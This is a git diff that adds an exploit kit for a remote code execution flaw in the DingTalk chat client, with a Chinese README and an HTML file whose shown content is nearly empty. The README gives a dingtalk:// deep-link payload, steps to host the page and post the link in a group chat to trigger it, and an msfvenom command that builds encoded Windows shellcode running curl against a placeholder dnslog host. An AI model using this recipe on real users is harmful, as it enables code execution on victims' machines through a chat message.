diff --git a/17-钉钉/exp.html b/17-钉钉/exp.html
new file mode 100644
index 0000000..880768b
--- /dev/null
+++ b/17-钉钉/exp.html
@@ -0,0 +1,10 @@
+
+
+
+ test
+
+
+
+
\ No newline at end of file
diff --git a/17-钉钉/readme.md b/17-钉钉/readme.md
new file mode 100644
index 0000000..1e06af8
--- /dev/null
+++ b/17-钉钉/readme.md
@@ -0,0 +1,12 @@
+# 钉钉RCE 漏洞
+
+> payload `dingtalk://dingtalkclient/page/link?url=127.0.0.1/exp.html&pc_slide=true`
+## 利用方式
+1. 启动web 服务`python -m http.server 80`
+2. 发送payload 到钉钉聊天群组中(个人聊天不能触发)
+
+## 其中shellcode 可以通过msfvenom定制
+
+ `msfvenom -a x86 –platform windows -p windows/exec cmd="curl xxx.dnslog.cn" -e x86/alpha_mixed -f csharp`
+
+ 将上面生成的内容调换到 exp.html 文件中的 `var shellcode=new Uint8Array([.....])`
\ No newline at end of file